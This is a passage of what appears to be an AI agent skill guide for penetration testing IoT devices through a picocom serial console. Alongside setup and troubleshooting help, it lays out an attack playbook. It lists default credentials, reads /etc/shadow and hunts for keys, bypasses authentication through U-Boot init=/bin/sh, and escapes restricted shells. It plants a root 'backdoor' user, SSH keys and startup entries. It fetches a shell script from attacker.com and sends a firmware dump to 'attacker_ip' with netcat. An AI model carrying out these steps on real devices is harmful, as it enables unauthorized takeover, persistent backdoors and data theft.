\"help\"\n\n# System information\n$HELPER --device $DEVICE --prompt \"$PROMPT\" --logfile \"$LOGFILE\" --command \"date\"\n$HELPER --device $DEVICE --prompt \"$PROMPT\" --logfile \"$LOGFILE\" --command \"runtime\"\n\n# Network configuration\n$HELPER --device $DEVICE --prompt \"$PROMPT\" --logfile \"$LOGFILE\" --command \"ifconfig\"\n$HELPER --device $DEVICE --prompt \"$PROMPT\" --logfile \"$LOGFILE\" --command \"route\"\n\n# Process listing (may need longer timeout)\n$HELPER --device $DEVICE --prompt \"$PROMPT\" --logfile \"$LOGFILE\" --timeout 5 --command \"ps\"\n\n# File system exploration\n$HELPER --device $DEVICE --prompt \"$PROMPT\" --logfile \"$LOGFILE\" --command \"ls\"\n$HELPER --device $DEVICE --prompt \"$PROMPT\" --logfile \"$LOGFILE\" --command \"ls /etc\"\n\n# Device identifiers\n$HELPER --device $DEVICE --prompt \"$PROMPT\" --logfile \"$LOGFILE\" --command \"getudid\"\n$HELPER --device $DEVICE --prompt \"$PROMPT\" --logfile \"$LOGFILE\" --command \"catmwarestate\"","type":"text"}]},{"type":"paragraph","content":[{"text":"IMPORTANT FOR CLAUDE CODE","type":"text","marks":[{"type":"strong"}]},{"text":": When using this skill, ALWAYS include ","type":"text"},{"text":"--logfile /tmp/serial_session.log","type":"text","marks":[{"type":"code_inline"}]},{"text":" in every command so the user can monitor activity with ","type":"text"},{"text":"tail -f /tmp/serial_session.log","type":"text","marks":[{"type":"code_inline"}]},{"text":".","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Alternative: Direct picocom Usage (Advanced)","type":"text"}]},{"type":"paragraph","content":[{"text":"If you need direct picocom access (e.g., for bootloader interaction during boot), you can use picocom directly. However, this is more complex and error-prone.","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Instructions","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"1. Connection Setup","type":"text"}]},{"type":"paragraph","content":[{"text":"CRITICAL","type":"text","marks":[{"type":"strong"}]},{"text":": picocom runs interactively and CANNOT be controlled via standard stdin/stdout pipes. Use the following approach:","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Always run picocom in a background shell","type":"text","marks":[{"type":"strong"}]},{"text":" using ","type":"text"},{"text":"run_in_background: true","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Monitor output","type":"text","marks":[{"type":"strong"}]},{"text":" using the BashOutput tool to read responses","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Send commands","type":"text","marks":[{"type":"strong"}]},{"text":" by using ","type":"text"},{"text":"Ctrl-A Ctrl-S","type":"text","marks":[{"type":"code_inline"}]},{"text":" to enter send mode, or by writing to the device file directly","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Default connection command:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"picocom -b 115200 --nolock --omap crlf --echo /dev/ttyUSB0","type":"text"}]},{"type":"paragraph","content":[{"text":"Defaults (unless specified otherwise):","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Baud rate","type":"text","marks":[{"type":"strong"}]},{"text":": 115200 (most common for IoT devices)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Device","type":"text","marks":[{"type":"strong"}]},{"text":": /dev/ttyUSB0 (most common USB-to-serial adapter)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Always use ","type":"text","marks":[{"type":"strong"}]},{"text":"--nolock","type":"text","marks":[{"type":"code_inline"},{"type":"strong"}]},{"text":": Prevents file locking issues unless user specifically requests otherwise","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Alternative baud rates","type":"text","marks":[{"type":"strong"}]},{"text":" (if 115200 doesn't work):","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"57600","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"38400","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"19200","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"9600","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"230400 (less common, high-speed)","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Alternative device paths:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"/dev/ttyUSB0, /dev/ttyUSB1, /dev/ttyUSB2, ... (USB-to-serial adapters)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"/dev/ttyACM0, /dev/ttyACM1, ... (USB CDC devices)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"/dev/ttyS0, /dev/ttyS1, ... (built-in serial ports)","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Essential picocom options:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"-b","type":"text","marks":[{"type":"code_inline"}]},{"text":" or ","type":"text"},{"text":"--baud","type":"text","marks":[{"type":"code_inline"}]},{"text":": Set baud rate (use 115200 by default)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"--nolock","type":"text","marks":[{"type":"code_inline"}]},{"text":": Disable file locking (ALWAYS use unless user asks not to)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"--omap crlf","type":"text","marks":[{"type":"code_inline"}]},{"text":": Map output CR to CRLF (helps with formatting)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"--echo","type":"text","marks":[{"type":"code_inline"}]},{"text":": Enable local echo (see what you type)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"--logfile \u003cfile>","type":"text","marks":[{"type":"code_inline"}]},{"text":": Log all session output to a file (recommended)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"-q","type":"text","marks":[{"type":"code_inline"}]},{"text":" or ","type":"text"},{"text":"--quiet","type":"text","marks":[{"type":"code_inline"}]},{"text":": Suppress picocom status messages","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"--imap lfcrlf","type":"text","marks":[{"type":"code_inline"}]},{"text":": Map LF to CRLF on input (sometimes needed)","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"2. Detecting Console State","type":"text"}]},{"type":"paragraph","content":[{"text":"After connecting, you need to identify what state the device is in:","type":"text"}]},{"type":"paragraph","content":[{"text":"a) Blank/Silent Console:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Press Enter several times to check for a prompt","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Try Ctrl-C to interrupt any running processes","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"If still nothing, the device may be in bootloader waiting state - try space bar or other bootloader interrupt keys","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"b) Bootloader (U-Boot, etc.):","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Look for prompts like ","type":"text"},{"text":"U-Boot>","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":"=>","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":"uboot>","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":"Boot>","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Bootloaders often have a countdown that can be interrupted","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Common interrupt keys: Space, Enter, specific keys mentioned in boot messages","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"c) Login Prompt:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Look for ","type":"text"},{"text":"login:","type":"text","marks":[{"type":"code_inline"}]},{"text":" or ","type":"text"},{"text":"username:","type":"text","marks":[{"type":"code_inline"}]},{"text":" prompts","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Common default credentials for IoT devices:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"root / root","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"admin / admin","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"root / (no password)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"admin / password","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Check manufacturer documentation or online databases","type":"text"}]}]}]}]}]},{"type":"paragraph","content":[{"text":"d) Shell Access:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"You may drop directly into a root shell","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Look for prompts like ","type":"text"},{"text":"#","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":"$","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":">","type":"text","marks":[{"type":"code_inline"}]},{"text":", or custom prompts","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"2.1. BusyBox Shells (Most IoT Devices)","type":"text"}]},{"type":"paragraph","content":[{"text":"IMPORTANT","type":"text","marks":[{"type":"strong"}]},{"text":": The vast majority of IoT devices use BusyBox, a lightweight suite of Unix utilities designed for embedded systems. BusyBox provides a minimal shell environment with limited command functionality.","type":"text"}]},{"type":"paragraph","content":[{"text":"Identifying BusyBox:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check what shell you're using\nbusybox\nbusybox --help\n\n# Or check symlinks\nls -la /bin/sh\n# Often shows: /bin/sh -> /bin/busybox\n\n# List available BusyBox applets\nbusybox --list","type":"text"}]},{"type":"paragraph","content":[{"text":"BusyBox Limitations:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Many standard Linux commands may be simplified versions","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Some common flags/options may not be available","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Features like tab completion may be limited or absent","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Some exploitation techniques that work on full Linux may not work","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Common BusyBox commands available:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Core utilities (usually available)\ncat, ls, cd, pwd, echo, cp, mv, rm, mkdir, chmod, chown\nps, kill, top, free, df, mount, umount\ngrep, find, sed, awk (limited versions)\nifconfig, route, ping, netstat, telnet\nvi (basic text editor - no syntax highlighting)\n\n# Check what's available\nbusybox --list | sort\nls /bin /sbin /usr/bin /usr/sbin","type":"text"}]},{"type":"paragraph","content":[{"text":"BusyBox-specific considerations for pentesting:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"ps","type":"text","marks":[{"type":"code_inline"}]},{"text":" output format may differ from standard Linux","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Some privilege escalation techniques require commands not in BusyBox","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"File permissions still work the same (SUID, sticky bits, etc.)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Networking tools are often present (telnet, wget, nc/netcat, ftpget)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Python/Perl/Ruby are usually NOT available (device storage constraints)","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Useful BusyBox commands for enumeration:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check BusyBox version (may have known vulnerabilities)\nbusybox | head -1\n\n# Network utilities often available\nnc -l -p 4444 # Netcat listener\nwget http://attacker.com/shell.sh\nftpget server file\ntelnet 192.168.1.1\n\n# httpd (web server) often included\nbusybox httpd -p 8080 -h /tmp # Quick file sharing","type":"text"}]},{"type":"paragraph","content":[{"text":"Reference Documentation:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"BusyBox Official Site","type":"text","marks":[{"type":"link","attrs":{"href":"https://busybox.net/","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"BusyBox Command List","type":"text","marks":[{"type":"link","attrs":{"href":"https://busybox.net/downloads/BusyBox.html","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"BusyBox Source Code","type":"text","marks":[{"type":"link","attrs":{"href":"https://git.busybox.net/busybox/","title":null}}]}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"3. Interacting with the Console","type":"text"}]},{"type":"paragraph","content":[{"text":"Sending commands to picocom:","type":"text","marks":[{"type":"strong"}]}]},{"type":"paragraph","content":[{"text":"Since picocom is interactive, you have several options:","type":"text"}]},{"type":"paragraph","content":[{"text":"Option A: Write directly to the device file","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"echo \"command\" > /dev/ttyUSB0","type":"text"}]},{"type":"paragraph","content":[{"text":"Option B: Use expect or similar tools","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"expect -c \"\n spawn picocom -b 115200 --nolock /dev/ttyUSB0\n send \\\"command\\r\\\"\n expect \\\"#\\\"\n exit\n\"","type":"text"}]},{"type":"paragraph","content":[{"text":"Option C: Use screen instead of picocom (may be easier to script)","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"screen /dev/ttyUSB0 115200","type":"text"}]},{"type":"paragraph","content":[{"text":"Picocom keyboard shortcuts:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Ctrl-A Ctrl-X","type":"text","marks":[{"type":"code_inline"}]},{"text":": Exit picocom","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Ctrl-A Ctrl-Q","type":"text","marks":[{"type":"code_inline"}]},{"text":": Quit without resetting","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Ctrl-A Ctrl-U","type":"text","marks":[{"type":"code_inline"}]},{"text":": Increase baud rate","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Ctrl-A Ctrl-D","type":"text","marks":[{"type":"code_inline"}]},{"text":": Decrease baud rate","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Ctrl-A Ctrl-T","type":"text","marks":[{"type":"code_inline"}]},{"text":": Toggle local echo","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Ctrl-A Ctrl-S","type":"text","marks":[{"type":"code_inline"}]},{"text":": Send file (can be used to send commands)","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"4. Device Enumeration","type":"text"}]},{"type":"paragraph","content":[{"text":"Once you have shell access, gather the following information:","type":"text"}]},{"type":"paragraph","content":[{"text":"System Information:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Kernel and system info\nuname -a\ncat /proc/version\ncat /proc/cpuinfo\ncat /proc/meminfo\n\n# Distribution/firmware info\ncat /etc/issue\ncat /etc/*release*\ncat /etc/*version*\n\n# Hostname and network\nhostname\ncat /etc/hostname\nifconfig -a\nip addr show\ncat /etc/network/interfaces\ncat /etc/resolv.conf\n\n# Mounted filesystems\nmount\ncat /proc/mounts\ndf -h\n\n# Running processes\nps aux\nps -ef\ntop -b -n 1","type":"text"}]},{"type":"paragraph","content":[{"text":"User and Permission Information:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Current user context\nid\nwhoami\ngroups\n\n# User accounts\ncat /etc/passwd\ncat /etc/shadow # If readable - major security issue!\ncat /etc/group\n\n# Sudo/privilege info\nsudo -l\ncat /etc/sudoers","type":"text"}]},{"type":"paragraph","content":[{"text":"Network Services:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Listening services\nnetstat -tulpn\nss -tulpn\nlsof -i\n\n# Firewall rules\niptables -L -n -v\ncat /etc/iptables/*","type":"text"}]},{"type":"paragraph","content":[{"text":"Interesting Files and Directories:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Configuration files\nls -la /etc/\nfind /etc/ -type f -readable\n\n# Web server configs\nls -la /etc/nginx/\nls -la /etc/apache2/\nls -la /var/www/\n\n# Credentials and keys\nfind / -name \"*.pem\" 2>/dev/null\nfind / -name \"*.key\" 2>/dev/null\nfind / -name \"*password*\" 2>/dev/null\nfind / -name \"*credential*\" 2>/dev/null\ngrep -r \"password\" /etc/ 2>/dev/null\n\n# SUID/SGID binaries (privilege escalation vectors)\nfind / -perm -4000 -type f 2>/dev/null\nfind / -perm -2000 -type f 2>/dev/null\n\n# World-writable files/directories\nfind / -perm -2 -type f 2>/dev/null\nfind / -perm -2 -type d 2>/dev/null\n\n# Development/debugging tools\nwhich gdb gcc python perl ruby tcpdump\nls /usr/bin/ /bin/ /sbin/ /usr/sbin/","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"5. Bootloader Exploitation","type":"text"}]},{"type":"paragraph","content":[{"text":"If you have access to the bootloader (U-Boot, etc.):","type":"text"}]},{"type":"paragraph","content":[{"text":"Common U-Boot commands:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Print environment variables\nprintenv\n\n# Modify boot arguments (e.g., init=/bin/sh for root shell)\nsetenv bootargs \"${bootargs} init=/bin/sh\"\nsaveenv\nboot\n\n# Alternative: single user mode\nsetenv bootargs \"${bootargs} single\"\nsetenv bootargs \"${bootargs} init=/bin/bash\"\n\n# Boot from network (TFTP) for custom firmware\nsetenv serverip 192.168.1.100\nsetenv ipaddr 192.168.1.200\ntftpboot 0x80000000 custom_image.bin\nbootm 0x80000000\n\n# Memory examination\nmd \u003caddress> # Memory display\nmm \u003caddress> # Memory modify\nmw \u003caddress> \u003cvalue> # Memory write\n\n# Flash operations\nerase \u003cstart> \u003cend>\ncp.b \u003csource> \u003cdest> \u003ccount>\n\n# Other useful commands\nhelp\nbdinfo # Board info\nversion\nreset","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"6. Privilege Escalation (if not root)","type":"text"}]},{"type":"paragraph","content":[{"text":"Check for common vulnerabilities:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Kernel exploits\nuname -r # Check kernel version for known exploits\n\n# Check for exploitable services\nps aux | grep root\n\n# Writable service files\nfind /etc/init.d/ -writable 2>/dev/null\nfind /lib/systemd/system/ -writable 2>/dev/null\n\n# Cron jobs\ncrontab -l\nls -la /etc/cron*\ncat /etc/crontab","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"7. Persistence and Further Access","type":"text"}]},{"type":"paragraph","content":[{"text":"Establish additional access methods:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Add SSH access\nmkdir -p /root/.ssh\necho \"your_ssh_public_key\" >> /root/.ssh/authorized_keys\nchmod 600 /root/.ssh/authorized_keys\nchmod 700 /root/.ssh\n\n# Start SSH service (if not running)\n/etc/init.d/ssh start\n# or\n/etc/init.d/sshd start\n# or\n/etc/init.d/dropbear start # Common on embedded devices\n\n# Add a backdoor user\necho \"backdoor:x:0:0::/root:/bin/sh\" >> /etc/passwd\npasswd backdoor\n\n# Add to startup scripts\necho \"/path/to/backdoor &\" >> /etc/rc.local","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"8. Firmware Extraction","type":"text"}]},{"type":"paragraph","content":[{"text":"Extract firmware for offline analysis:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Find MTD partitions (common on embedded devices)\ncat /proc/mtd\ncat /proc/partitions\n\n# Dump flash partitions\ndd if=/dev/mtd0 of=/tmp/bootloader.bin\ndd if=/dev/mtd1 of=/tmp/kernel.bin\ndd if=/dev/mtd2 of=/tmp/rootfs.bin\n\n# Copy to external storage or network\n# If network is available:\nnc attacker_ip 4444 \u003c /tmp/rootfs.bin\n\n# If USB storage is available:\nmount /dev/sda1 /mnt\ncp /tmp/*.bin /mnt/\numount /mnt","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"9. Cleanup and Exit","type":"text"}]},{"type":"paragraph","content":[{"text":"To exit picocom:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Press ","type":"text"},{"text":"Ctrl-A","type":"text","marks":[{"type":"code_inline"}]},{"text":" followed by ","type":"text"},{"text":"Ctrl-X","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Or use ","type":"text"},{"text":"killall picocom","type":"text","marks":[{"type":"code_inline"}]},{"text":" from another terminal","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"If you need to kill the background shell:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Use the KillShell tool with the appropriate shell_id","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Common IoT Device Scenarios","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Scenario 1: No Authentication Shell","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Connect\npicocom -b 115200 --nolock /dev/ttyUSB0\n\n# Press Enter, get root shell immediately\n# Enumerate and exploit","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Scenario 2: Password-Protected Shell","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Connect and see login prompt\n# Try default credentials:\n# - root/root\n# - admin/admin\n# - root/(empty)\n# Search online for device-specific defaults","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Scenario 3: Bootloader to Root Shell","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Interrupt boot countdown (press Space/Enter)\n# Get U-Boot prompt\nsetenv bootargs \"${bootargs} init=/bin/sh\"\nboot\n# Get root shell without authentication","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Scenario 4: Limited Shell Escape","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# If you get a limited shell:\n# Try common escape techniques:\necho $SHELL\n/bin/sh\n/bin/bash\nvi # Then :!/bin/sh\nless /etc/passwd # Then !/bin/sh\nfind / -exec /bin/sh \\;\nawk 'BEGIN {system(\"/bin/sh\")}'","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Security Testing Checklist","type":"text"}]},{"type":"checkbox_list","attrs":{"id":null},"content":[{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Identify device and firmware version","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Check for default credentials","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Enumerate network services and open ports","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Check for hardcoded credentials in files","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Test for command injection vulnerabilities","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Check file permissions (SUID, world-writable)","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Test bootloader security (password protection, command restrictions)","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Check for outdated software with known CVEs","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Test for privilege escalation vectors","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Extract firmware for offline analysis","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Document all findings with screenshots/logs","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Best Practices","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Always log your session","type":"text","marks":[{"type":"strong"}]},{"text":": Use ","type":"text"},{"text":"--logfile session.log","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Document everything","type":"text","marks":[{"type":"strong"}]},{"text":": Take notes on commands, responses, and findings","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Be patient","type":"text","marks":[{"type":"strong"}]},{"text":": Some devices are slow and may take time to respond","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Check baud rate","type":"text","marks":[{"type":"strong"}]},{"text":": Wrong baud rate = garbage output. Try common rates if you see garbled text","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Research the device","type":"text","marks":[{"type":"strong"}]},{"text":": Look up known vulnerabilities, default credentials, and common issues","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Use proper authorization","type":"text","marks":[{"type":"strong"}]},{"text":": Only perform pentesting on devices you own or have explicit permission to test","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Backup","type":"text","marks":[{"type":"strong"}]},{"text":": If possible, backup firmware before making modifications","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Be careful with bootloader","type":"text","marks":[{"type":"strong"}]},{"text":": Incorrect bootloader commands can brick devices","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Troubleshooting","type":"text"}]},{"type":"paragraph","content":[{"text":"Problem: Garbled text or strange characters","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Solution: Wrong baud rate. Try 115200, 57600, 38400, 19200, 9600","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Problem: No output at all","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Solution: Check physical connections, try pressing Enter, check if device is powered on","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Problem: \"Device busy\" or \"Permission denied\"","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Solution: Close other programs using the serial port, check user permissions (","type":"text"},{"text":"sudo usermod -a -G dialout $USER","type":"text","marks":[{"type":"code_inline"}]},{"text":")","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Problem: Commands not echoing","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Solution: Enable local echo with ","type":"text"},{"text":"--echo","type":"text","marks":[{"type":"code_inline"}]},{"text":" flag or press ","type":"text"},{"text":"Ctrl-A Ctrl-T","type":"text","marks":[{"type":"code_inline"}]},{"text":" in picocom","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Problem: Wrong line endings (extra lines or no line breaks)","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Solution: Use ","type":"text"},{"text":"--omap crlf","type":"text","marks":[{"type":"code_inline"}]},{"text":" or ","type":"text"},{"text":"--imap lfcrlf","type":"text","marks":[{"type":"code_inline"}]},{"text":" options","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Example Usage","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Basic connection (using defaults)\npicocom -b 115200 --nolock --echo --omap crlf /dev/ttyUSB0\n\n# Connection with logging\npicocom -b 115200 --nolock --echo 